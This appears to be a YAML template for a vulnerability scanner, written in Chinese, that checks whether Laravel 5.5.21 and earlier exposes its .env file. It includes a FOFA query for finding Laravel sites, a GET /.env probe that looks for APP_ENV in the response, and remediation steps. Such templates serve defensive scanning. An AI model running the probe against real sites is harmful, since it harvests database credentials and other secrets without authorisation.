product: Laravel
vName: Laravel 配置信息泄漏
type: 信息泄漏
vID: [ ]
level: 2
vDesc: Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄漏漏洞。远程攻击者可利用该漏洞获取敏感信息（数据库账号密码信息、开发框架及版本等），可以进一步攻击网站系统及服务器。
version: ''
note: ''
search:
  FOFA: app="Laravel-Framework"
protocol: http
link: ''
fix:
  - 关闭laravel配置文件中的调试功能，在.env文件中找到APP_DEBUG=true，将true改为false。
  - 添加访问控制权限，设置禁止访问配置文件等敏感信息。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /.env
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - APP_ENV
            logic: and